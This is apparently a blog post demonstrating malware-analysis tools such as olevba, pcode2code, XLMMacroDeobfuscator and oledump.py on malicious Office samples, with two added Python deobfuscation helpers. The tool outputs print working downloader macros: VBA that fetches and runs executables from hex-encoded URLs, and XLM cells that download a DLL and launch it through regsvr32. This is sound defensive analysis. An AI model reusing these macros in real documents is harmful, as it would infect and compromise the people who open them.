
Tools for investigating suspicious Office files

Posted at 2022-04-15

Office-file malware such as Emotet and Qakbot has been on the rise, so this post introduces tools that are useful for analyzing Office files.

oletools

A package bundling a range of tools for analyzing OLE files.
It is written in Python and can be installed with pip.
Describing every tool would take too long, so only some of them are covered here.

oleid

Checks an OLE file for suspicious features.

cmd.exe
C:\Users\masaomi\Downloads>oleid sample.xls
oleid 0.60.dev1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

Filename: sample.xls
--------------------+--------------------+----------+--------------------------
Indicator           |Value               |Risk      |Description
--------------------+--------------------+----------+--------------------------
File format         |MS Excel 97-2003    |info      |
                    |Workbook or Template|          |
--------------------+--------------------+----------+--------------------------
Container format    |OLE                 |info      |Container type
--------------------+--------------------+----------+--------------------------
Application name    |Microsoft Excel     |info      |Application name declared
                    |                    |          |in properties
--------------------+--------------------+----------+--------------------------
Properties code page|1252: ANSI Latin 1; |info      |Code page used for
                    |Western European    |          |properties
                    |(Windows)           |          |
--------------------+--------------------+----------+--------------------------
Encrypted           |False               |none      |The file is not encrypted
--------------------+--------------------+----------+--------------------------
VBA Macros          |Yes, suspicious     |HIGH      |This file contains VBA
                    |                    |          |macros. Suspicious
                    |                    |          |keywords were found. Use
                    |                    |          |olevba and mraptor for
                    |                    |          |more info.
--------------------+--------------------+----------+--------------------------
XLM Macros          |No                  |none      |This file does not contain
                    |                    |          |Excel 4/XLM macros.
--------------------+--------------------+----------+--------------------------
External            |0                   |none      |External relationships
Relationships       |                    |          |such as remote templates,
                    |                    |          |remote OLE objects, etc
--------------------+--------------------+----------+--------------------------

olevba

Extracts the VBA macro code and checks it for suspicious parts.

cmd.exe
C:\Users\masaomi\Downloads>olevba sample.xls
olevba 0.60 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: sample.xls
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: sample.xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Sheet2.cls
in file: sample.xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Workbook_BeforeClose(Cancel As Boolean)
    With ActiveSheet
        Dim Prog As String

        For Each c In .Comments
            If InStr(4, c.Text, "W", 1) Then
                Prog = c.Text
                CreateObject(c.Text).UILevel = 2
            End If

            If InStr(4, c.Text, ":", 1) Then
                CreateObject(Prog).InstallProduct c.Text
            End If
        Next
    End With
End Sub

-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet

+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Workbook_BeforeClose|Runs when the Excel Workbook is closed       |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

oleobj

Extracts the objects inside an OLE file.

cmd.exe
C:\Users\masaomi\Downloads>oleobj sample.xlsm
oleobj 0.56.1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

-------------------------------------------------------------------------------
File: 'sample.xlsm'
Found relationship 'hyperlink' with external link hxxps://○○○.com/wp-admin/A8/%22,%22
Found relationship 'hyperlink' with external link hxxp://○○○.com/replace/fVea/%22,%22
Found relationship 'hyperlink' with external link hxxp://○○○.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/%22,%22
Found relationship 'hyperlink' with external link hxxp://www.○○○.com/wp-content/Y/%22,%22
Found relationship 'hyperlink' with external link hxxp://www.○○○.com/thegrandbrands/eGd55tEm9qkPNOhViP/%22,%22
Found relationship 'hyperlink' with external link hxxp://www.○○○.com/wp-includes/HLDoANj/%22,%22

※ Parts of the URLs have been replaced.

rtfobj

Extracts the objects inside an RTF file.

cmd.exe
C:\Users\masaomi\Downloads>rtfobj sample.doc
rtfobj 0.60 on Python 3.8.10 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'sample.doc' - size: 223241 bytes
---+----------+---------------------------------------------------------------
id |index     |OLE Object
---+----------+---------------------------------------------------------------
0  |0000095Dh |format_id: 2 (Embedded)
   |          |class name: b'package'
   |          |data size: 15717
   |          |OLE Package object:
   |          |Filename: 'abdtfhgYgeghDp\x8d.scT'
   |          |Source path: 'C:\\nsdsTggH\\abdtfhgYgeghDp\x8d.scT'
   |          |Temp path = 'C:\\CekepaD\x87\\abdtfhgYgeghDp\x8d.scT'
   |          |MD5 = '789d9c850c8dc9bdeb4a89df5fbab578'
   |          |EXECUTABLE FILE
   |          |File Type: Unknown file type
---+----------+---------------------------------------------------------------
1  |00008A01h |format_id: 2 (Embedded)
   |          |class name: b'OLE2LInk'
   |          |data size: 2560
   |          |MD5 = 'a2665c0164f8e68c32273b9b696d9d9e'
   |          |CLSID: 00000300-0000-0000-C000-000000000046
   |          |StdOleLink (embedded OLE object - Known Related to
   |          |CVE-2017-0199, CVE-2017-8570, CVE-2017-8759 or CVE-2018-8174)
---+----------+---------------------------------------------------------------

olebrowse

Displays the data streams of an OLE file in a GUI.
[Screenshot 2022-04-10 15.51.07.png]
[Screenshot 2022-04-10 15.53.12.png]

SSView

A tool for viewing and editing the data streams of an OLE file.
It also renders embedded images, HTML and the like.
[Screenshot 2022-04-10 16.18.45.png]
[Screenshot 2022-04-10 16.19.57.png]
[Screenshot 2022-04-10 16.21.16.png]

pcodedmp/pcode2code

pcodedmp disassembles the VBA macro code and pcode2code decompiles it.

pcodedmp

cmd.exe
C:\Users\masaomi\Downloads>pcodedmp sample.xls
Processing file: sample.xls
===============================================================================
dir stream: _VBA_PROJECT_CUR/VBA/dir
-------------------------------------------------------------------------------
dir stream after decompression:
1358 bytes
dir stream parsed:
00000000:  PROJ_SYSKIND:
00000000   01 00 00 00                                        ....

0000000A:  PROJ_LCID:
00000000   09 04 00 00                                        ....

00000014:  PROJ_LCIDINVOKE:
00000000   09 04 00 00                                        ....

0000001E:  PROJ_CODEPAGE:
00000000   E4 04                                              ..

00000026:  PROJ_NAME:
00000000   56 42 41 50 72 6F 6A 65 63 74                      VBAProject

00000036:  PROJ_DOCSTRING
0000003C:  PROJ_UNICODE_DOCSTRING
00000042:  PROJ_HELPFILE
00000048:  PROJ_UNICODE_HELPFILE
0000004E:  PROJ_HELPCONTEXT:
00000000   00 00 00 00                                        ....

00000058:  PROJ_LIBFLAGS:
00000000   00 00 00 00                                        ....

00000062:  PROJ_VERSION:
00000000   58 FF 4F 64 0D 00                                  X.Od..

0000006E:  PROJ_CONSTANTS
00000074:  PROJ_UNICODE_CONSTANTS
0000007A:  PROJ_REFNAME_PROJ:
00000000   73 74 64 6F 6C 65                                  stdole

00000086:  PROJ_UNICODE_REFNAME_PROJ:
00000000   73 00 74 00 64 00 6F 00 6C 00 65 00                s.t.d.o.l.e.

00000098:  PROJ_LIBID_REGISTERED:
00000000   5E 00 00 00 2A 5C 47 7B 30 30 30 32 30 34 33 30    ^...*\G{00020430
00000010   2D 30 30 30 30 2D 30 30 30 30 2D 43 30 30 30 2D    -0000-0000-C000-
00000020   30 30 30 30 30 30 30 30 30 30 34 36 7D 23 32 2E    000000000046}#2.
00000030   30 23 30 23 43 3A 5C 57 69 6E 64 6F 77 73 5C 53    0#0#C:\Windows\S
00000040   79 73 57 4F 57 36 34 5C 73 74 64 6F 6C 65 32 2E    ysWOW64\stdole2.
00000050   74 6C 62 23 4F 4C 45 20 41 75 74 6F 6D 61 74 69    tlb#OLE Automati
00000060   6F 6E 00 00 00 00 00 00                            on......

00000106:  PROJ_REFNAME_PROJ:
00000000   4F 66 66 69 63 65                                  Office

00000112:  PROJ_UNICODE_REFNAME_PROJ:
00000000   4F 00 66 00 66 00 69 00 63 00 65 00                O.f.f.i.c.e.

00000124:  PROJ_LIBID_REGISTERED:
00000000   9A 00 00 00 2A 5C 47 7B 32 44 46 38 44 30 34 43    ....*\G{2DF8D04C
00000010   2D 35 42 46 41 2D 31 30 31 42 2D 42 44 45 35 2D    -5BFA-101B-BDE5-
00000020   30 30 41 41 30 30 34 34 44 45 35 32 7D 23 32 2E    00AA0044DE52}#2.
00000030   30 23 30 23 43 3A 5C 50 72 6F 67 72 61 6D 20 46    0#0#C:\Program F
00000040   69 6C 65 73 20 28 78 38 36 29 5C 43 6F 6D 6D 6F    iles (x86)\Commo
00000050   6E 20 46 69 6C 65 73 5C 4D 69 63 72 6F 73 6F 66    n Files\Microsof
00000060   74 20 53 68 61 72 65 64 5C 4F 46 46 49 43 45 31    t Shared\OFFICE1
00000070   32 5C 4D 53 4F 2E 44 4C 4C 23 4D 69 63 72 6F 73    2\MSO.DLL#Micros
00000080   6F 66 74 20 4F 66 66 69 63 65 20 31 32 2E 30 20    oft Office 12.0 
00000090   4F 62 6A 65 63 74 20 4C 69 62 72 61 72 79 00 00    Object Library..
000000A0   00 00 00 00                                        ....

(remainder omitted)

With -d, only the p-code is disassembled.

cmd.exe
C:\Users\masaomi\Downloads>pcodedmp -d sample.xls
Processing file: sample.xls
===============================================================================
Module streams:
_VBA_PROJECT_CUR/VBA/ThisWorkbook - 3553 bytes
Line #0:
	FuncDefn (Private Sub jkmyjkgeozuikp())
Line #1:
	Dim 
	VarDefn abzpluxvhrslhaqrd (As String)
Line #2:
	Dim 
	VarDefn dzclesss (As String)
Line #3:
	Dim 
	VarDefn aemngpsicijyqastoqi (As Object)
	VarDefn oklqeyqirsr (As Object)
Line #4:
	Dim 
	VarDefn zuqxesnr (As Integer)
Line #5:
	LitStr 0x003E "68747470733a2f2f7472616e736665722e73682f796c6a7548752f30303031"
	ArgsLd ggwyizkwoeai 0x0001 
	LitStr 0x0016 "4b4c43323032322e657865"
	ArgsLd ggwyizkwoeai 0x0001 
	Concat 
	St abzpluxvhrslhaqrd

(remainder omitted)

pcode2code

pcode2code decompiles the VBA macro code from the output of pcodedmp.

cmd.exe
C:\Users\masaomi\Downloads>pcode2code sample.xls
stream : _VBA_PROJECT_CUR/VBA/ThisWorkbook - 3553 bytes

########################################



Private Sub jkmyjkgeozuikp()

  Dim abzpluxvhrslhaqrd As String

  Dim dzclesss As String

  Dim aemngpsicijyqastoqi As Object, oklqeyqirsr As Object

  Dim zuqxesnr As Integer

  abzpluxvhrslhaqrd = ggwyizkwoeai("68747470733a2f2f7472616e736665722e73682f796c6a7548752f30303031") & ggwyizkwoeai("4b4c43323032322e657865")

  dzclesss = ggwyizkwoeai("6b") & ggwyizkwoeai("6c632e657865")

  dzclesss = Environ("TEMP") & "\" & dzclesss

  Set aemngpsicijyqastoqi = CreateObject(ggwyizkwoeai("4d53584d4c322e536572766572") & ggwyizkwoeai("584d4c485454502e362e30"))

  aemngpsicijyqastoqi.setOption(2) = 13056

  aemngpsicijyqastoqi.Open ggwyizkwoeai("474554"), abzpluxvhrslhaqrd, False

  aemngpsicijyqastoqi.setRequestHeader ggwyizkwoeai("557365") & ggwyizkwoeai("722d4167656e74"), ggwyizkwoeai("4d6f7a69") & ggwyizkwoeai("6c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e5420352e3029")

  aemngpsicijyqastoqi.Send

  If aemngpsicijyqastoqi.Status = 200 Then

    Set oklqeyqirsr = CreateObject(ggwyizkwoeai("41") & ggwyizkwoeai("444f44422e53747265616d"))

    oklqeyqirsr.Open

    oklqeyqirsr.Type = 1

    oklqeyqirsr.Xor aemngpsicijyqastoqi.ResponseBody

    oklqeyqirsr.SaveToFile dzclesss, 2

    oklqeyqirsr.Close

    mxjnxrbn dzclesss

  End If

End Sub

(remainder omitted)

XLMMacroDeobfuscator

A tool that decodes obfuscated XLM macros.
It is also bundled with oletools.

cmd.exe
C:\Users\masaomi\Downloads>xlmdeobfuscator --file sample.xls

XLMMacroDeobfuscator(v0.2.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator

File: C:\Users\masaomi\Downloads\sample.xls

Unencrypted xls file

[Loading Cells]
auto_open: auto_open->'EGVEB'!$D$1
[Starting Deobfuscation]
CELL:D5        , FullEvaluation      , "False"
CELL:D9        , FullEvaluation      , CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"hxxp://○○○.com/wp-content/Cw3aR6792f/","..\nhth.dll",0,0)
CELL:D11       , FullEvaluation      , IF(UJFD1<0,CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○/i"&"n"&"v"&"o"&"i"&"c"&"e/"&"m/","..\nhth.dll",0,0))
CELL:D13       , FullEvaluation      , IF(UJFD2<0,CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○/d"&"o"&"w"&"n"&"l"&"o"&"a"&"d"&"s/8"&"d"&"R9"&"p"&"g"&"N"&"B"&"F"&"t"&"z/","..\nhth.dll",0,0))
CELL:D15       , FullEvaluation      , IF(UJFD3<0,CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"h"&"t"&"tp"&"s:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○/w"&"p-in"&"clu"&"de"&"s/v"&"2"&"q"&"F"&"A"&"l"&"M"&"Z"&"E"&"L"&"R"&"k"&"xb"&"z/","..\nhth.dll",0,0))
CELL:D17       , FullEvaluation      , IF(UJFD4<0,CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○/w"&"p-c"&"o"&"n"&"t"&"e"&"n"&"t/s"&"S"&"J"&"q"&"J/","..\nhth.dll",0,0))
CELL:D19       , FullEvaluation      , IF(UJFD5<0,CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○/w"&"p-i"&"n"&"cl"&"u"&"d"&"e"&"s/T"&"5"&"q"&"X"&"A"&"R"&"8"&"p"&"5/","..\nhth.dll",0,0))
CELL:D23       , FullEvaluation      , IF(UJFD6<0,CLOSE(0),)
CELL:D25       , PartialEvaluation   , =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\nhth.dll")
CELL:D29       , FullEvaluation      , RETURN()

Files:

[END of Deobfuscation]
time elapsed: 0.2964000701904297

※ Parts of the URLs and strings have been replaced.
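Even after deobfuscation, the cells above still hide their download locations behind long "h"&"tt"&"p:/" concatenations, and the CALL() and EXEC() cells are what an analyst actually needs to pull out. The following is an added Python example, not part of the original post or of XLMMacroDeobfuscator: it reads xlmdeobfuscator "CELL:" lines, folds the concatenations and summarizes the CALL()/EXEC() targets with the URLs defanged. The input lines are constructed to match the output format shown above, with placeholder hosts.

```python
import re

# Two string literals joined by "&" (Excel 4.0 macro syntax, as in the cells above).
ADJACENT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
STRING_LITERAL = re.compile(r'"([^"]*)"')

# Constructed xlmdeobfuscator output lines in the format shown above; hosts are placeholders.
XLM_SAMPLE = [
    r'CELL:D9        , FullEvaluation      , CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"http://placeholder.invalid/a/","..\nhth.dll",0,0)',
    r'CELL:D11       , FullEvaluation      , IF(UJFD1<0,CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"h"&"tt"&"p:/"&"/place"&"holder.invalid/b/","..\nhth.dll",0,0))',
    r'CELL:D23       , FullEvaluation      , IF(UJFD6<0,CLOSE(0),)',
    r'CELL:D25       , PartialEvaluation   , =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\nhth.dll")',
]


def fold_concat(formula):
    """Merge "a" & "b" into "ab", repeating until no adjacent pair is left."""
    prev = None
    while prev != formula:
        prev = formula
        formula = ADJACENT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), formula)
    return formula


def defang(url):
    """Make a URL safe to paste into a report (hxxp, [.])."""
    return re.sub(r"^http", "hxxp", url).replace(".", "[.]")


def xlm_indicators(lines):
    """Return one dict per cell that calls into a DLL (CALL) or spawns a process (EXEC)."""
    findings = []
    for line in lines:
        if not line.startswith("CELL:"):
            continue
        parts = [p.strip() for p in line.split(",", 2)]  # cell, evaluation mode, formula
        if len(parts) < 3:
            continue
        cell, formula = parts[0][len("CELL:"):], fold_concat(parts[2])
        literals = STRING_LITERAL.findall(formula)
        if "CALL(" in formula and len(literals) >= 2:
            findings.append({
                "cell": cell,
                "func": "CALL",
                # CALL(dll, "export,type signature", ...): keep only the export name
                "target": "%s!%s" % (literals[0], literals[1].split(",")[0]),
                "urls": [defang(s) for s in literals[2:] if s.startswith("http")],
            })
        elif "EXEC(" in formula and literals:
            findings.append({"cell": cell, "func": "EXEC", "command": literals[0]})
    return findings


if __name__ == "__main__":
    for finding in xlm_indicators(XLM_SAMPLE):
        print(finding)
```

Feeding the real xlmdeobfuscator output in through stdin instead of XLM_SAMPLE is the only change needed; the CALL target (urlmon!URLDownloadToFileA) and the regsvr32 command line are the indicators worth carrying into a detection rule.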

DidierStevensSuite

A package bundling tools that are useful for analyzing all sorts of things.
Of these, the ones that are useful for analyzing Office files are introduced here.

oledump.py

Analyzes OLE files.
Run without options, it lists the data streams.
A number marked with M or m indicates that the stream contains a macro.
It is M when the code contains statements other than Attribute and Option statements, and m when it does not.

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py sample.xls
  1:       102 '\x01CompObj'
  2:       236 '\x05DocumentSummaryInformation'
  3:       180 '\x05SummaryInformation'
  4:     16381 'Workbook'
  5:       449 '_VBA_PROJECT_CUR/PROJECT'
  6:        77 '_VBA_PROJECT_CUR/PROJECTwm'
  7:      2813 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
  8:      1545 '_VBA_PROJECT_CUR/VBA/__SRP_0'
  9:       155 '_VBA_PROJECT_CUR/VBA/__SRP_1'
 10:       170 '_VBA_PROJECT_CUR/VBA/__SRP_2'
 11:       170 '_VBA_PROJECT_CUR/VBA/__SRP_3'
 12: M    1345 '_VBA_PROJECT_CUR/VBA/abdfiihow'
 13:       563 '_VBA_PROJECT_CUR/VBA/dir'
 14: m     990 '_VBA_PROJECT_CUR/VBA/Лист1'
 15: M    2375 '_VBA_PROJECT_CUR/VBA/ЭтаКнига'

Adding "-s <stream number>" shows the contents of that stream.

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py -s 1 sample.xls
00000000: 01 00 FE FF 03 0A 00 00  FF FF FF FF 20 08 02 00  ............ ...
00000010: 00 00 00 00 C0 00 00 00  00 00 00 46 1A 00 00 00  ...........F....
00000020: CB E8 F1 F2 20 4D 69 63  72 6F 73 6F 66 74 20 45  .... Microsoft E
00000030: 78 63 65 6C 20 32 30 30  33 00 06 00 00 00 42 69  xcel 2003.....Bi
00000040: 66 66 38 00 0E 00 00 00  45 78 63 65 6C 2E 53 68  ff8.....Excel.Sh
00000050: 65 65 74 2E 38 00 F4 39  B2 71 00 00 00 00 00 00  eet.8..9.q......
00000060: 00 00 00 00 00 00                                 ......

Adding "-S" extracts only the strings.

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py -s 1 -S sample.xls
 Microsoft Excel 2003
Biff8
Excel.Sheet.8

Adding "-v" displays the VBA macro.

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py -s 15 -v sample.xls
Attribute VB_Name = "????????"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Application.ScreenUpdating = False
Dim xHttp: Set jgccsmkbfbunzevjs = CreateObject(rkixcetefmdfoip("4d6963726f736f66742e584d") & rkixcetefmdfoip("4c48545450"))
Dim bStrm: Set ecxtnnvma = CreateObject(rkixcetefmdfoip("41646f64") & rkixcetefmdfoip("622e53747265616d"))
jgccsmkbfbunzevjs.Open rkixcetefmdfoip("474554"), rkixcetefmdfoip("687474703a") & rkixcetefmdfoip("2f2f3136382e3130302e382e34322f737069736f6b2e657865"), False
jgccsmkbfbunzevjs.Send
Dim leicqooi As String
leicqooi = Environ("AppData")
With ecxtnnvma
.Type = 1
.Open
.write jgccsmkbfbunzevjs.responseBody
.savetofile leicqooi & rkixcetefmdfoip("5c72756e73782e65") & rkixcetefmdfoip("7865"), 2
End With
Shell (leicqooi & rkixcetefmdfoip("5c72") & rkixcetefmdfoip("756e73782e657865"))

Application.ScreenUpdating = True
End Sub
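Both macros shown above, the pcode2code output and this oledump.py -v output, build every string by passing hex literals to a helper function (ggwyizkwoeai and rkixcetefmdfoip respectively) and joining the pieces with &; this is the pattern olevba reports as "Hex Strings". The following added Python example, which is not from the original post or from oletools, rewrites such calls into plain literals so the macro can be read directly. The helper name d and the sample macro are constructed in the style of the decompiled code, with the download URL replaced by a placeholder host.

```python
import re

# helper("hex") with any helper name; the macros above use ggwyizkwoeai and rkixcetefmdfoip
HEX_CALL = re.compile(r'\b([A-Za-z_]\w*)\("([0-9A-Fa-f]{2,})"\)')
# two string literals joined by & (VBA string concatenation)
ADJACENT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
STRING_LITERAL = re.compile(r'"([^"]*)"')

# Constructed macro in the style of the decompiled code above; d() stands for the hex helper.
VBA_SAMPLE = "\n".join([
    'Set h = CreateObject(d("4d53584d4c322e536572766572") & d("584d4c485454502e362e30"))',
    'h.Open d("474554"), d("68747470733a2f2f6578616d706c652e696e76616c6964") & d("2f"), False',
    'h.setRequestHeader d("557365") & d("722d4167656e74"), "Mozilla/4.0"',
    'Set s = CreateObject(d("41") & d("444f44422e53747265616d"))',
])


def _decode_call(m):
    """Turn d("474554") into "GET"; leave calls that do not decode to printable ASCII untouched."""
    try:
        text = bytes.fromhex(m.group(2)).decode("ascii")
    except ValueError:  # odd length, non-hex digits, or bytes outside ASCII
        return m.group(0)
    if not text.isprintable():
        return m.group(0)
    return '"%s"' % text.replace('"', '""')  # VBA escapes a quote by doubling it


def fold_concat(src):
    """Merge "a" & "b" into "ab", repeating until nothing changes."""
    prev = None
    while prev != src:
        prev = src
        src = ADJACENT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), src)
    return src


def decode_hex_calls(src):
    """Rewrite hex-helper calls to literals, then fold the concatenations."""
    return fold_concat(HEX_CALL.sub(_decode_call, src))


def string_literals(src):
    """All string literals of the decoded macro: COM class names, HTTP verbs, URLs, paths."""
    return STRING_LITERAL.findall(decode_hex_calls(src))


if __name__ == "__main__":
    print(decode_hex_calls(VBA_SAMPLE))
    print(string_literals(VBA_SAMPLE))
```

Because the decoder accepts any helper name, it also works when the helper is renamed between samples; calls whose argument does not decode to printable ASCII are left as they are, so a legitimate call that happens to take a hex-looking argument is not mangled.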

rtfdump.py

Analyzes RTF files.
The options are similar to those of oledump.py.

cmd.exe
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py sample.doc
    1 Level  1        c=    7 p=00000000 l=  223239 h=  219001;  135857 b=       0   u=     292 \rtf
    2  Level  2       c=    0 p=000000b2 l=    1644 h=     158;      23 b=       0   u=     203 \lsdlockedexcept
    3  Level  2       c=    1 p=000007e6 l=     177 h=      34;       8 b=       0   u=      65 \rtlch
    4   Level  3      c=    0 p=00000877 l=      17 h=       6;       2 b=       0   u=       7 \b
    5  Level  2       c=    2 p=000008ab l=   32939 h=   31514;     286 b=       0 O u=       0 \object
      Name: b'package\x00' Size: 15717 md5: a47631a4dcc39d2f2704709899b91cf6 magic: 02006162
    6   Level  3      c=    0 p=000008bf l=     145 h=       0;      10 b=       0   u=       0 \objw1
    7   Level  3      c=    0 p=00000954 l=   32761 h=   31514;     286 b=       0 O u=       0 \objdata
      Name: b'package\x00' Size: 15717 md5: a47631a4dcc39d2f2704709899b91cf6 magic: 02006162
    8  Level  2       c=    2 p=00008958 l=    5442 h=    5270;    4154 b=       0   u=      14 \object
    9   Level  3      c=    0 p=00008967 l=      27 h=       5;       1 b=       0   u=      10 \*\objclass Word.Document.8
   10   Level  3      c=    1 p=00008984 l=    5397 h=    5267;    4154 b=       0   u=       4 \objdat
   11    Level  4     c=    2 p=0000898e l=    5386 h=    5265;    4154 b=       0 O u=       4 \dptxbxtext
      Name: b'OLE2LInk\x00' Size: 2560 md5: a2665c0164f8e68c32273b9b696d9d9e magic: d0cf11e0
   12     Level  5    c=    0 p=000089dd l=       6 h=       0;       0 b=       0   u=       2 \ud
   13     Level  5    c=    0 p=000089ef l=       6 h=       0;       0 b=       0   u=       2 \ud
   14  Level  2       c=    1 p=00009e9e l=   24862 h=   24599;   24595 b=       0   u=      10 \shprslt
   15   Level  3      c=    1 p=00009ea7 l=   24852 h=   24599;   24595 b=       0   u=      10 \*\do
   16    Level  4     c=    1 p=00009ed5 l=   24805 h=   24599;   24595 b=       0   u=      10 \dptxbxtext
   17     Level  5    c=    1 p=00009f1e l=   24731 h=   24599;   24595 b=       0   u=      10 \pard
   18      Level  6   c=    2 p=00009f5c l=   24668 h=   24599;   24595 b=       0   u=      10 \object
   19       Level  7  c=    0 p=00009f7f l=      26 h=       4;       1 b=       0   u=      10 \*\objclass Word.Picture.8
   20       Level  7  c=    0 p=00009f9b l=   24604 h=   24596;   24595 b=       0   u=       1 \objda
   21  Level  2       c=    1 p=0000ffbe l=   21693 h=   21537;   21537 b=       0   u=       0 \pict
   22   Level  3      c=    0 p=0001004e l=   21548 h=   21537;   21537 b=       0   u=       0 \*\blipuid
   23  Level  2       c=    1 p=0001547d l=  136071 h=  135889;  135857 b=       0   u=       0 \nonshppict
   24   Level  3      c=    1 p=00015489 l=  136058 h=  135889;  135857 b=       0   u=       0 \pict
   25    Level  4     c=    0 p=00015526 l=      43 h=      32;      32 b=       0   u=       0 \*\blipuid

Adding "-O" shows only the entries that contain objects.

cmd.exe
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -O sample.doc
1: Name: b'package\x00'
   Magic: b'02006162'
   Size: 15717
   Hash: md5 a47631a4dcc39d2f2704709899b91cf6
2: Name: b'OLE2LInk\x00'
   Magic: b'd0cf11e0'
   Size: 2560
   Hash: md5 a2665c0164f8e68c32273b9b696d9d9e

Adding "-s <stream number>" shows the contents of that stream.

cmd.exe
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -s 3 sample.doc
00000000: 5C 66 63 73 31 20 5C 61  66 33 31 35 30 37 20 5C  \fcs1 \af31507 \
00000010: 6C 74 72 63 68 5C 66 63  73 30 20 5C 69 6E 73 72  ltrch\fcs0 \insr
00000020: 73 69 64 34 39 33 32 35  39 33 20 0D 0A 4D 69 63  sid4932593 ..Mic
00000030: 72 6F 73 6F 66 74 20 4F  66 66 69 63 65 20 64 6F  rosoft Office do
00000040: 65 73 20 6E 6F 74 20 77  6F 72 6B 20 69 6E 20 65  es not work in e
00000050: 6D 61 69 6C 20 50 72 65  76 69 65 77 2E 5C 6C 69  mail Preview.\li
00000060: 6E 65 20 50 6C 65 61 73  65 20 64 6F 77 6E 6C 6F  ne Please downlo
00000070: 61 64 20 74 68 65 20 64  6F 63 75 6D 65 6E 74 20  ad the document
00000080: 61 6E 64 20 63 6C 69 63  6B 20 7B 5C 62 20 45 6E  and click {\b En
00000090: 61 62 6C 65 20 45 64 69  74 69 6E 67 7D 20 77 68  able Editing} wh
000000A0: 65 6E 20 6F 70 65 6E 69  6E 67 2E                 en opening.

Adding "-H" decodes the hexadecimal data.

cmd.exe
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -s 7 -H sample.doc
00000000: 01 05 00 00 02 00 00 00  08 00 00 00 70 61 63 6B  ............pack
00000010: 61 67 65 00 00 00 00 00  00 00 00 00 65 3D 00 00  age.........e=..
00000020: 02 00 61 62 64 74 66 68  67 59 67 65 67 68 44 70  ..abdtfhgYgeghDp
00000030: 8D 2E 73 63 54 00 43 3A  5C 6E 73 64 73 54 67 67  ..scT.C:\nsdsTgg
00000040: 48 5C 61 62 64 74 66 68  67 59 67 65 67 68 44 70  H\abdtfhgYgeghDp
00000050: 8D 2E 73 63 54 00 00 00  03 00 20 00 00 00 43 3A  ..scT..... ...C:
00000060: 5C 43 65 6B 65 70 61 44  87 5C 61 62 64 74 66 68  \CekepaD.\abdtfh
00000070: 67 59 67 65 67 68 44 70  8D 2E 73 63 54 00 9E 78  gYgeghDp..scT..x
00000080: 00 00 0D 0A 3C 73 63 72  69 70 74 6C 65 54 0D 0A  ....<scriptleT..
00000090: 20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 3E                 >
000000A0: 0D 0A 3C 73 63 72 69 70  74 20 6C 61 6E 67 75 61  ..<script langua
